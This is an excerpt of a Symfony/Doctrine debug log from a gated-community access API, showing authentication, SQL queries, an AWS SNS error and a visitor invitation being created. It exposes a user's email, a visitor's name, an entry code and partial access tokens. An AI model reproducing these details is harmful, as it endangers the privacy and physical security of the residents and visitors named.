  7810. [2025-12-20 19:30:07] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? [15] []
  7811. [2025-12-20 19:30:07] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
  7812. [2025-12-20 19:30:07] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.other_user AS other_user_6, t0.news AS news_7, t0.new_events AS new_events_8, t0.invited_entry AS invited_entry_9, t0.invited_confirmation AS invited_confirmation_10, t0.user_id AS user_id_11, t0.address_id AS address_id_12, t0.control_gate_id AS control_gate_id_13 FROM notification_setting t0 WHERE t0.user_id = ? AND t0.address_id = ? LIMIT 1 [398,274] []
  7813. [2025-12-20 19:30:08] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  7814. [2025-12-20 19:30:08] request.INFO: Matched route "device_post_uuid". {"route":"device_post_uuid","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\DeviceController::devicePOSTAction","domain":"api.unda.co","_route":"device_post_uuid"},"request_uri":"https://api.unda.co/device","method":"POST"} []
  7815. [2025-12-20 19:30:08] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  7816. [2025-12-20 19:30:08] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  7817. [2025-12-20 19:30:08] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  7818. [2025-12-20 19:30:08] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  7819. [2025-12-20 19:30:08] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["44b5b9e6a8d88fdffe816d2232 [...]"] []
  7820. [2025-12-20 19:30:08] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  7821. [2025-12-20 19:30:08] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  7822. [2025-12-20 19:30:08] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  7823. [2025-12-20 19:30:08] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  7824. [2025-12-20 19:30:08] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.guid AS guid_6, t0.endpoint_arn AS endpoint_arn_7, t0.token AS token_8, t0.identifier AS identifier_9, t0.model AS model_10, t0.os AS os_11, t0.app_version AS app_version_12, t0.arn_status AS arn_status_13, t0.type AS type_14, t0.app AS app_15, t0.user_id AS user_id_16 FROM device t0 WHERE t0.identifier = ? AND t0.type = ? AND t0.user_id = ? LIMIT 1 ["450EEF16-4822-4D9B-B6A0-EF [...]",1,398] []
  7825. [2025-12-20 19:30:08] request.INFO: Matched route "address_get_uuid_invitation". {"route":"address_get_uuid_invitation","route_parameters":{"size":"10","page":"0","_controller":"Hona\\ApiBundle\\Controller\\AddressController::addressInvitationGETAction","domain":"api.unda.co","uuid":"c95c459d-212c-4555-98e9-59cee00445e5","_route":"address_get_uuid_invitation"},"request_uri":"https://api.unda.co/address/c95c459d-212c-4555-98e9-59cee00445e5/invitation/10/0?order=desc","method":"GET"} []
  7826. [2025-12-20 19:30:08] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  7827. [2025-12-20 19:30:08] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  7828. [2025-12-20 19:30:08] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  7829. [2025-12-20 19:30:08] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  7830. [2025-12-20 19:30:08] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["44b5b9e6a8d88fdffe816d2232 [...]"] []
  7831. [2025-12-20 19:30:08] request.CRITICAL: Uncaught PHP Exception Aws\Sns\Exception\SnsException: "Error executing "CreatePlatformEndpoint" on "https://sns.us-east-1.amazonaws.com"; AWS HTTP error: Client error: `POST https://sns.us-east-1.amazonaws.com` resulted in a `403 Forbidden` response: <ErrorResponse xmlns="http://sns.amazonaws.com/doc/2010-03-31/">   <Error>     <Type>Sender</Type>     <Code>InvalidClie (truncated...)  InvalidClientTokenId (client): The security token included in the request is invalid. - <ErrorResponse xmlns="http://sns.amazonaws.com/doc/2010-03-31/">   <Error>     <Type>Sender</Type>     <Code>InvalidClientTokenId</Code>     <Message>The security token included in the request is invalid.</Message>   </Error>   <RequestId>f35134db-1a31-572c-8958-551be1b12f61</RequestId> </ErrorResponse> " at /var/repositories/hona/vendor/aws/aws-sdk-php/src/WrappedHttpHandler.php line 195 {"exception":"[object] (Aws\\Sns\\Exception\\SnsException(code: 0): Error executing \"CreatePlatformEndpoint\" on \"https://sns.us-east-1.amazonaws.com\"; AWS HTTP error: Client error: `POST https://sns.us-east-1.amazonaws.com` resulted in a `403 Forbidden` response:\n<ErrorResponse xmlns=\"http://sns.amazonaws.com/doc/2010-03-31/\">\n  <Error>\n    <Type>Sender</Type>\n    <Code>InvalidClie (truncated...)\n InvalidClientTokenId (client): The security token included in the request is invalid. - <ErrorResponse xmlns=\"http://sns.amazonaws.com/doc/2010-03-31/\">\n  <Error>\n    <Type>Sender</Type>\n    <Code>InvalidClientTokenId</Code>\n    <Message>The security token included in the request is invalid.</Message>\n  </Error>\n  <RequestId>f35134db-1a31-572c-8958-551be1b12f61</RequestId>\n</ErrorResponse>\n at /var/repositories/hona/vendor/aws/aws-sdk-php/src/WrappedHttpHandler.php:195, GuzzleHttp\\Exception\\ClientException(code: 403): Client error: `POST https://sns.us-east-1.amazonaws.com` resulted in a `403 Forbidden` response:\n<ErrorResponse xmlns=\"http://sns.amazonaws.com/doc/2010-03-31/\">\n  <Error>\n    <Type>Sender</Type>\n    <Code>InvalidClie (truncated...)\n at /var/repositories/hona/vendor/guzzlehttp/guzzle/src/Exception/RequestException.php:113)"} []
  7832. [2025-12-20 19:30:08] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  7833. [2025-12-20 19:30:08] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  7834. [2025-12-20 19:30:08] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  7835. [2025-12-20 19:30:08] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  7836. [2025-12-20 19:30:08] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
  7837. [2025-12-20 19:30:08] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [398,274,1] []
  7838. [2025-12-20 19:30:08] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
  7839. [2025-12-20 19:30:08] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? LIMIT 1 [15] []
  7840. [2025-12-20 19:30:08] doctrine.DEBUG: SELECT i0_.id AS id_0, i0_.uuid AS uuid_1, i0_.status AS status_2, i0_.date_created AS date_created_3, i0_.date_modified AS date_modified_4, i0_.name AS name_5, i0_.last_name AS last_name_6, i0_.code AS code_7, i0_.image_code_path AS image_code_path_8, i0_.type AS type_9, i0_.subtype AS subtype_10, i0_.date_invitation AS date_invitation_11, i0_.date_start AS date_start_12, i0_.date_end AS date_end_13, i0_.event_id AS event_id_14, i0_.address_id AS address_id_15, i0_.user_id AS user_id_16 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) ORDER BY i0_.date_invitation DESC LIMIT 10 OFFSET 0 [274,1] []
  7841. [2025-12-20 19:30:08] doctrine.DEBUG: SELECT count(i0_.id) AS sclr_0 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) [274,1] []
  7842. [2025-12-20 19:30:08] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  7843. [2025-12-20 19:30:08] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  7844. [2025-12-20 19:30:08] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  7845. [2025-12-20 19:30:13] request.INFO: Matched route "residential_get_uuid_providers". {"route":"residential_get_uuid_providers","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\ResidentialController::residentialProvidersGETAction","domain":"api.unda.co","uuid":"c95c459d-212c-4555-98e9-59cee00445e5","_route":"residential_get_uuid_providers"},"request_uri":"https://api.unda.co/residential/c95c459d-212c-4555-98e9-59cee00445e5/providers","method":"GET"} []
  7846. [2025-12-20 19:30:13] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
  7847. [2025-12-20 19:30:13] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["44b5b9e6a8d88fdffe816d2232 [...]"] []
  7848. [2025-12-20 19:30:13] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  7849. [2025-12-20 19:30:13] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosyadri25@gmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
  7850. [2025-12-20 19:30:13] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
  7851. [2025-12-20 19:30:13] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  7852. [2025-12-20 19:30:13] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  7853. [2025-12-20 19:30:13] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  7854. [2025-12-20 19:30:13] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  7855. [2025-12-20 19:30:13] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["44b5b9e6a8d88fdffe816d2232 [...]"] []
  7856. [2025-12-20 19:30:13] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  7857. [2025-12-20 19:30:13] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  7858. [2025-12-20 19:30:13] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  7859. [2025-12-20 19:30:13] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  7860. [2025-12-20 19:30:13] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  7861. [2025-12-20 19:30:43] request.INFO: Matched route "invitation_create". {"route":"invitation_create","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\InvitationController::invitationCreateAction","domain":"api.unda.co","_route":"invitation_create"},"request_uri":"https://api.unda.co/invitation/create","method":"POST"} []
  7862. [2025-12-20 19:30:43] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
  7863. [2025-12-20 19:30:43] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["44b5b9e6a8d88fdffe816d2232 [...]"] []
  7864. [2025-12-20 19:30:43] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  7865. [2025-12-20 19:30:43] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosyadri25@gmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
  7866. [2025-12-20 19:30:43] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
  7867. [2025-12-20 19:30:43] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  7868. [2025-12-20 19:30:43] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  7869. [2025-12-20 19:30:43] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  7870. [2025-12-20 19:30:43] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  7871. [2025-12-20 19:30:43] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["44b5b9e6a8d88fdffe816d2232 [...]"] []
  7872. [2025-12-20 19:30:43] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  7873. [2025-12-20 19:30:43] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  7874. [2025-12-20 19:30:43] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  7875. [2025-12-20 19:30:43] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  7876. [2025-12-20 19:30:43] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
  7877. [2025-12-20 19:30:43] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [398,274,1] []
  7878. [2025-12-20 19:30:43] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["914a4df2-219f-4106-974f-ce [...]"] []
  7879. [2025-12-20 19:30:43] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
  7880. [2025-12-20 19:30:43] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?)) WHERE (a0_.id = ?) AND (a0_.status = ?) LIMIT 1 [398,274,1] []
  7881. [2025-12-20 19:30:43] doctrine.DEBUG: "START TRANSACTION" [] []
  7882. [2025-12-20 19:30:43] doctrine.DEBUG: INSERT INTO invitation (uuid, status, date_created, date_modified, name, last_name, code, image_code_path, type, subtype, date_invitation, date_start, date_end, event_id, address_id, user_id) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?) {"1":"69824b80-888f-475b-885d-19 [...]","2":1,"3":"2025-12-20 19:30:43","4":"2025-12-20 19:30:43","5":"Jose Elías","6":"Nahuat","7":"680207","8":"/invitation/629fa8880a65b9 [...]","9":"1","10":null,"11":"2025-12-20 19:30:00","12":null,"13":null,"14":null,"15":274,"16":398} []
  7883. [2025-12-20 19:30:43] doctrine.DEBUG: "COMMIT" [] []
  7884. [2025-12-20 19:30:43] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  7885. [2025-12-20 19:30:43] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.id = ? LIMIT 1 [274] []
  7886. [2025-12-20 19:30:43] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  7887. [2025-12-20 19:30:43] request.INFO: Matched route "address_get_uuid_invitation". {"route":"address_get_uuid_invitation","route_parameters":{"size":"20","page":"0","_controller":"Hona\\ApiBundle\\Controller\\AddressController::addressInvitationGETAction","domain":"api.unda.co","uuid":"c95c459d-212c-4555-98e9-59cee00445e5","_route":"address_get_uuid_invitation"},"request_uri":"https://api.unda.co/address/c95c459d-212c-4555-98e9-59cee00445e5/invitation/20/0?order=desc","method":"GET"} []
  7888. [2025-12-20 19:30:43] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
  7889. [2025-12-20 19:30:43] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["44b5b9e6a8d88fdffe816d2232 [...]"] []
  7890. [2025-12-20 19:30:43] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  7891. [2025-12-20 19:30:43] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosyadri25@gmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
  7892. [2025-12-20 19:30:43] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
  7893. [2025-12-20 19:30:43] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  7894. [2025-12-20 19:30:43] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  7895. [2025-12-20 19:30:43] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  7896. [2025-12-20 19:30:43] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  7897. [2025-12-20 19:30:43] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["44b5b9e6a8d88fdffe816d2232 [...]"] []
  7898. [2025-12-20 19:30:43] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  7899. [2025-12-20 19:30:43] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  7900. [2025-12-20 19:30:43] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  7901. [2025-12-20 19:30:43] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  7902. [2025-12-20 19:30:43] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
